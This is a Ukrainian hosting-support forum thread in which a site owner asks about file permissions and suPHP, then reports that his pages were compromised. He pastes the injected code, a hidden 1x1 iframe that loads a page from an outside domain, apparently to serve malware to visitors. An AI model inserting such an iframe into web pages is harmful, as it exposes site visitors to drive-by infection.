Попередня тема :: Наступна тема |
Автор |
Повідомлення |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: четвер, 27 грудня, 2007 16:11 Тема повідомлення: Питання безпеки |
 |
|
Поясніть мені будь ласка, як може бути що права на файл виставлено 644, а запустивши РНР-шний скріпт той здійснив в нього запис!?!?!
Дякую |
|
Догори |
|
 |
Kyrya
Користувач хостингу

З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ
|
Написане: четвер, 27 грудня, 2007 16:32 Тема повідомлення: |
 |
|
Таке може бути, якщо скрипт запускався з правами власника. Дивіться скріншот. У того файлу права 644.
_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
 |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: четвер, 27 грудня, 2007 19:04 Тема повідомлення: |
 |
|
Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Це точно!- я ж настроївся на глюк, а тут все пішло!!! |
|
Догори |
|
 |
Kyrya
Користувач хостингу

З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ
|
Написане: четвер, 27 грудня, 2007 19:56 Тема повідомлення: |
 |
|
BIBLOS написав: |
Скрипт запускався без прав ВЛАСНИКА!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
Чому Ви так вирішили?
_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
|
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: четвер, 27 грудня, 2007 20:23 Тема повідомлення: |
 |
|
скрипт закинув через ФТП
Закрив, виставив права 644
Тоді через http запустив скрипт встановлення - все пішло запсало, створило новий файл. Я ж через http не авторизувався,
отже скрипт сам без всяких прав створив файлик і записав його!
Як? |
|
Догори |
|
 |
Дмитро
TopUA: Адміністратор
З нами з: 01.10.06
Повідомлень: 1230
|
Написане: четвер, 27 грудня, 2007 21:13 Тема повідомлення: |
 |
|
Пошукайте у гуглі про SuPHP 
Це те, що мають мати всі хостери заради безпеки користувачів (але нажаль, дуже мало хто переймається безпекою).
_________________
● Підтримка користувачів — виключно через форум підтримки
● Умови надання послуг безкоштовного хостингу |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: вівторок, 22 січня, 2008 12:52 Тема повідомлення: |
 |
|
Дякую за відповідь. Пошукав, почитав.
Та я нічого не знаю за механізм, і в неті теж не описується, тільки констатація що це і для чого.
Я так зрозумів це модуль який виконує скрипт з правами власника, але ж тоді можна написати код якого небудь двигунця, відкрити доступ до закачки, і "лазити" по чужих сайтах використовуючи функції suPHP?! |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: середа, 06 лютого, 2008 15:40 Тема повідомлення: |
 |
|
Ще потрібна консультація, чи то відповідь:
Появився на сайті в коді такий собі
...http://leohin.com/.....
Це справа рук Адміна чи "мене Хакнули"?
Дякую!?!?!?!?! |
|
Догори |
|
 |
Kyrya
Користувач хостингу

З нами з: 16.10.06
Повідомлень: 265
Звідки: Дніпропетровськ
|
Написане: середа, 06 лютого, 2008 15:57 Тема повідомлення: |
 |
|
Де у коді? Я головну завантажив - нічого немає.
_________________
"Суть не в тому, щоб якомога швидше знайти завітну дорогу, а суть в тому, щоб якомога більше побачити по цій дорозі" © Вавілон ХХ
 |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: середа, 06 лютого, 2008 16:16 Тема повідомлення: |
 |
|
СОРІ! Я щойно закинув оновлення!!!!
Забувся, прошу вибачення, але наведений код СПРАВДІ ТАМ був.
Я це замітив по зміні розміру Контрольної копії і на сайті, а після -в модзілі заблоковано було ЯВА, воно мене "обізвало", я зразу закачав і був в шоці, але подумав -можливо це хостери - але ваша відповідь мене насторожує - ЯК!?!?!?!
>>
Привіт!
Подивіться вихідний текст завантаженої сторінки!!!!!!!
там таке
<iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
Я фреймів не люблю в принципі, і користуюсь сам особисо на 0 %, тому коду такого НЕ ВСТАВЛЯВ ні звідки!!!
??? |
|
Догори |
|
 |
Дмитро
TopUA: Адміністратор
З нами з: 01.10.06
Повідомлень: 1230
|
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: четвер, 07 лютого, 2008 18:45 Тема повідомлення: |
 |
|
2 компютери з 3 перевірені...поки чисто...
Але тепер ще один прикол (його теж раніше не було)
Модзілка показує що заблокований скрипт "about:blank" при загрузці сторінок BIBLOS? |
|
Догори |
|
 |
Дмитро
TopUA: Адміністратор
З нами з: 01.10.06
Повідомлень: 1230
|
Написане: п'ятниця, 08 лютого, 2008 01:03 Тема повідомлення: |
 |
|
Поясніть мені, яке я маю до цього відношення? Дуже прошу самотужки розбиратись з тим, що ви встановлюєте на вашому акаунті.
Змініть паролі, видаліть троянів. Якщо є проблема з сервером — буду радий допомогти, але проблеми з сервером немає.
Дякую.
_________________
● Підтримка користувачів — виключно через форум підтримки
● Умови надання послуг безкоштовного хостингу |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: п'ятниця, 08 лютого, 2008 13:21 Тема повідомлення: |
 |
|
Прошу не ображатись 
Я справді таких випадків не мав! -на третьому компі були Трояни
Буду знати і постараюсь більше не турбувати з такого приводу 
Дякую |
|
Догори |
|
 |
BIBLOS
Користувач хостингу
З нами з: 24.10.06
Повідомлень: 80
|
Написане: четвер, 14 лютого, 2008 16:46 Тема повідомлення: |
 |
|
Ну ось? Машина чиста, перевірив 5 різними прогами. Більше на сайт не ходив.Я змінив пароль, витер куки і нічого більше не робив.
Пройшло 2 дні -
Прошу загрузити титул - http://www.BIBLOS.org.ua/
там прогружається Ява з ІР- 58.....
 |
|
Догори |
|
 |
|